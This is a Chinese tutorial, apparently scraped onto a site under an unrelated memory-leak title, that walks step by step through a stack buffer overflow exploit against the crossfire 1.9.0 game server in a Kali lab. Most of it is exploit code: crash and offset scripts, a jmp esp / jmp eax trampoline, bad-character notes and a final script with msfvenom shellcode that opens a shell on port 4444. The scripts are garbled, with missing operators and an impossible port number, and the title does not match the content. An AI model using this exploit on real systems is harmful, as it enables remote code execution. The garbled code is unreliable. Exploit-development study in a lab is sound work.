linux下内存泄漏如何处理（Linux下的缓冲区溢出案例）

小君 2023-07-25 10:56:37 187

linux下内存泄漏如何处理（Linux下的缓冲区溢出案例）检查端口是否打开，执行命令netstat -pan，如果在列表中有端口13327就表明服务正常启动了。进入/bin文件夹里执行./crossfire就可以启动服务。32位是指计算机CPU位数，是指地址总线位数。靶机是不是32位其实都无所谓，但是64位系统的寻址空间为2^64，寻址过大，会提升难度和增加寻址的时间，为了简化操作，所以这里选用32位系统。在靶机上安装crossfire 1.9.0，安装目录有要求，必须在/usr/games/：解压安装

前面介绍过了Windows下的缓冲区溢出案例，这里再介绍一个Linux下的缓冲区溢出案例。

缓冲区溢出都是指具体的程序，这次要介绍的案例就是crossfire 1.9.0这个游戏，比较喜欢玩游戏的同学对于这个游戏的中文名：穿越火线，应该都很熟悉。

crossfire 1.9.0缓冲区溢出的规律是接受入站 socket 连接时存在缓冲区溢出漏洞。

缓冲区溢出：crossfire 1.9.0

测试准备：1.一台kali的靶机（32位），一台kali的攻击机。

32位是指计算机CPU位数，是指地址总线位数。靶机是不是32位其实都无所谓，但是64位系统的寻址空间为2^64，寻址过大，会提升难度和增加寻址的时间，为了简化操作，所以这里选用32位系统。

在靶机上安装crossfire 1.9.0，安装目录有要求，必须在/usr/games/：

linux下内存泄漏如何处理（Linux下的缓冲区溢出案例）(1)

解压安装

进入/bin文件夹里执行./crossfire就可以启动服务。

检查端口是否打开，执行命令netstat -pan，如果在列表中有端口13327就表明服务正常启动了。

在靶机运行crossfire期间，如果靶机是连上了网络的，网络上如果有人发现了靶机，也是可以对靶机进行攻击的，而且这个漏洞已经被公开好久了，很多人都拿这个漏洞来练习过，所以最好还是做一下处理，避免开放的端口被其他人攻击：

iptables -A INPUT -p tcp --destination-port 13327 \~ -d 127.0.0.1 -j DROP #只有通过本机访问本地网卡的13327 iptables -A INPUT -p tcp --destination-port 4444 \~ -d 127.0.0.1 -j DROP #只有通过本机访问本地网卡4444

然后就需要和上一个案例中一样，查看内存里的EIP了，但是用的工具不同，早期的kali会预装edb-debugger，但是新版本的kali没有在预装这个工具，粗略的找了找，有几个替代品，但是我一时半会也没搞懂怎么用，网上对应的教程也比较少。还是先安装一个edb-debugger使用吧，安装的话最好直接找压缩包传到kali，如果通过网络从github上下载，很难说能不能下载成功。

确认存在缓冲区溢出

edb-debugger安装成功后，调试crossfire的进程，通过执行下面这个命令：

edb --run /usr/games/crossfire/bin/crossfire

界面出来后，记得到debug菜单里点击run两次，这样edb就能运行起来了。

linux下内存泄漏如何处理（Linux下的缓冲区溢出案例）(2)

edb界面

运行起来后，edb-output调试输出窗口显示waitting for connections：

linux下内存泄漏如何处理（Linux下的缓冲区溢出案例）(3)

edb-output

这个程序和一般的溢出不同，它必须发送固定的数据量（4379个字节）才可以发生溢出，而不是大于某个数据量都可以。不清楚最开始的工程师是怎么发现这个特定的数据量的。

写一个脚本验证一下缓冲区溢出：

#!/usr/bin/python3 import socket host='192.168.0.103' crash='\x41'*4379 # 4379个'A' buffer='\x11(setup sound ' crash '\x90\x00#' s=socket.socket(socket.AF_INET socket.SOCK_STREAM) print('\nSending evil buffer...') s.connect((host 113327) data=s.recv(1024) print(data) s.send(buffer.encode('utf-8')) s.close() print('\nPayload Sent!')

给脚本加权限，然后执行。edb遇到缓冲区溢出时，会有弹窗提示：

linux下内存泄漏如何处理（Linux下的缓冲区溢出案例）(4)

故障弹窗

看edb里的EIP：

linux下内存泄漏如何处理（Linux下的缓冲区溢出案例）(5)

EIP

EIP已经被覆盖成0x41414141地址，这个是我们传入的，说明EIP可控，存在溢出。

通过测试增加一个A或者减少一个A发送，会发现后边两个数值都不是A，都不可控，也就是说数据量只有为4379时EIP才完全可控。

精确定位缓冲区溢出

和前一个案例一样，使用pattern_create.rb生成一个4379字节长度的字符串：

linux下内存泄漏如何处理（Linux下的缓冲区溢出案例）(6)

./pattern_create.rb -l 4379

用获得的字符串长度，写一个脚本：

#!/usr/bin/python3 import socket host='192.168.0.103' crash='Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp' buffer='\x11(setup sound ' crash '\x90\x00#' s=socket.socket(socket.AF_INET socket.SOCK_STREAM) print('\nSending evil buffer...') s.connect((host 113327) data=s.recv(1024) print(data) s.send(buffer.encode('utf-8')) s.close() print('\nPayload Sent!')

检查crossfire服务是否还在运行，edb切换到运行状态。然后执行脚本：

linux下内存泄漏如何处理（Linux下的缓冲区溢出案例）(7)

故障弹窗

得到缓冲区溢出时，EIP中内容是46367046，调换一下顺序，在根据ascii码表转换后得到Fp6F，定位在字符串里的位置：

linux下内存泄漏如何处理（Linux下的缓冲区溢出案例）(8)

./pattern_offset.rb -q Fp6F

可以看到偏移量是4368，也就是说EIP地址前面有4368个字符。4369，4370，4371，4372的位置存放的是溢出后的EIP地址。

再用脚本验证一下这个结果：

#!/usr/bin/python3 import socket host='192.168.0.103' crash='\x41'*4368 'B'*4 'C'*7 # 总长度还是要控制在4379个 buffer='\x11(setup sound ' crash '\x90\x00#' s=socket.socket(socket.AF_INET socket.SOCK_STREAM) print('\nSending evil buffer...') s.connect((host 113327) data=s.recv(1024) print(data) s.send(buffer.encode('utf-8')) s.close() print('\nPayload Sent!')

执行脚本后，确认EIP中存入的是BBBB的ascii码：

linux下内存泄漏如何处理（Linux下的缓冲区溢出案例）(9)

故障弹窗

在edb中也可以看到EIP被存入了BBBB：

linux下内存泄漏如何处理（Linux下的缓冲区溢出案例）(10)

EIP

确认有效的重定向路径

右键ESP，选择 Follow In Dump 查看数据，可以看到ESP寄存器填充了7个C：

linux下内存泄漏如何处理（Linux下的缓冲区溢出案例）(11)

ESP

因为必须是精确的字节才能溢出，就是说ESP寄存器只能存放7个字节，显然无法在ESP中存放shellcode，需要重新寻找一个寄存器。

几个寄存器都查看后，选择了EAX。因为EAX存放的是我们之前发送的几千个A，是可控的，且有足够的大小存放shellcode。

linux下内存泄漏如何处理（Linux下的缓冲区溢出案例）(12)

EAX

因为setup sound为服务器指令，所以前十二个字节须先发送setup sound。所以需要让EIP存放EAX的地址，然后在地址上加12，直接从第一个A的位置开始执行。但是各个机器的EAX的地址也各不相同，不具有通用性，所以直接跳转的思路就放弃。

既然ESP不能直接存放shellcode，且只能存放7个字节，那就从ESP跳转EAX并偏移12字节。归纳一下就是从EIP跳到ESP，再从ESP跳到EAX并偏移12字节。

接下来我们要需要将汇编指令转换为十六进制，kali有个预装的工具nasm_shell.rb：

linux下内存泄漏如何处理（Linux下的缓冲区溢出案例）(13)

汇编指令转换

实现跳转只需5个字节，ESP有足够的空间存放这5个字节。

跳转的内容我们用十六进制表示 \x83\xc0\x0c\xff\xe0\x90\x90

\x90：跳转字符防止被过滤，计算机读入数据顺序与人类阅读顺序相反。

根据上面获取的信息，再写一个脚本：

#!/usr/bin/python3 import socket host='192.168.0.103' crash='\x41'*4368 'B'*4 '\x83\xc0\x0c\xff\xe0\x90\x90' # 总长度还是要控制在4379个 buffer='\x11(setup sound ' crash '\x90\x00#' s=socket.socket(socket.AF_INET socket.SOCK_STREAM) print('\nSending evil buffer...') s.connect((host 113327) data=s.recv(1024) print(data) s.send(buffer.encode('utf-8')) s.close() print('\nPayload Sent!')

执行脚本，EIP还是被4个B覆盖：

linux下内存泄漏如何处理（Linux下的缓冲区溢出案例）(14)

故障弹窗

右键ESP，点击Follow In Dump，可以看到ESP寄存器被成功覆盖为十六进制的\x83\xc0\x0c\xff\xe0\x90\x90：

linux下内存泄漏如何处理（Linux下的缓冲区溢出案例）(15)

ESP

转化为汇编语言就是我们的跳转指令jmp eax和add eax 12。

现在已经能从ESP跳转到EAX了，但是我们还不能保证从EIP跳转到ESP，接下来就要完成这个逻辑。

打开edb，菜单栏 Plugins => OpcodeSearcher => OpcodeSearch，然后选择crossfire程序，ESP -> EIP，选择一个jmp esp 的地址，这个地址是不会变的：

linux下内存泄漏如何处理（Linux下的缓冲区溢出案例）(16)

jmp esp的地址

这里提一下，靶机要用32位的，否则64位系统这里会出现问题，如下图：

linux下内存泄漏如何处理（Linux下的缓冲区溢出案例）(17)

结果为空

edb的菜单栏 plugin => breakpointmanager => breakpoints 选择add增加我们上边选择的地址的断点用来测试：

linux下内存泄漏如何处理（Linux下的缓冲区溢出案例）(18)

增加断点

测试脚本如下：

#!/usr/bin/python3 import socket host='192.168.0.103' crash='\x41'*4368 '\x96\x45\x13\x08'*4 '\x83\xc0\x0c\xff\xe0\x90\x90' # 总长度还是要控制在4379个 buffer='\x11(setup sound ' crash '\x90\x00#' s=socket.socket(socket.AF_INET socket.SOCK_STREAM) print('\nSending evil buffer...') s.connect((host 113327) data=s.recv(1024) print(data) s.send(buffer.encode('utf-8')) s.close() print('\nPayload Sent!')

执行脚本后，会在断点处停留，然后点击F8执行下一步，就会跳转到ESP，然后再点击F8，又会跳转到EAX。到这里我们就确认了有效的重定向路径。

构造shellcode

前面其实还有一步，找出影响shellcode的坏字符，这个完全和上一个案例的操作一致，就不重复了，经过测试坏字符是\x00\x0a\x0d\x20。

现在我们要构造一个有效的shellcode，还是使用kali中的工具msfvenom：

linux下内存泄漏如何处理（Linux下的缓冲区溢出案例）(19)

生成shellcode

构造攻击脚本：

#!/usr/bin/python3 import socket host='192.168.0.103' shellcode= ('\xbf\x99\x24\x9c\x66\xdd\xc5\xd9\x74\x24\xf4\x58\x2b\xc9\xb1' '\x1f\x31\x78\x15\x83\xe8\xfc\x03\x78\x11\xe2\x6c\x4e\x96\x38' '\xbf\x54\x51\x27\xec\x29\xcd\xc2\x10\x1e\x97\x9b\xf5\x93\xd8' '\x0b\xae\x43\x19\x9b\x50\xf2\xf1\xde\x50\xeb\x5d\x56\xb1\x61' '\x38\x30\x61\x27\x93\x49\x60\x84\xd6\xca\xe7\xcb\x90\xd3\xa9' '\xbf\x5f\x8c\x97\x40\xa0\x4c\x8f\x2a\xa0\x26\x2a\x22\x43\x87' '\xfd\xf9\x04\x6d\x3d\x78\xb8\x85\x9a\xc9\xc5\xe0\xe4\x3d\xca' '\x12\x6d\xde\x0b\xf9\x61\xe0\x6f\xf2\xc9\x9f\xa2\x8b\xac\xa0' '\x45\x9c\xf5\xa9\x57\x05\xbb\xc0\x27\x35\x76\x94\xcd\xfa\xf0' '\x97\x32\x1b\xb8\x99\xcc\xdc\xb8\x22\xcd\xdc\xb8\x54\x03\x5c') '\x41'*2868 '\x96\x45\x13\x08'*4 '\x83\xc0\x0c\xff\xe0\x90\x90' # 总长度还是要控制在4379个 buffer='\x11(setup sound ' shellcode '\x90\x00#' s=socket.socket(socket.AF_INET socket.SOCK_STREAM) print('\nSending evil buffer...') s.connect((host 113327) data=s.recv(1024) print(data) s.send(buffer.encode('utf-8')) s.close() print('\nPayload Sent!')

打开攻击机的4444端口，然后执行攻击脚本，攻击机就能获取shell了。

网站首页

返回栏目

linux下内存泄漏如何处理（Linux下的缓冲区溢出案例）

猜您喜欢：

相关文章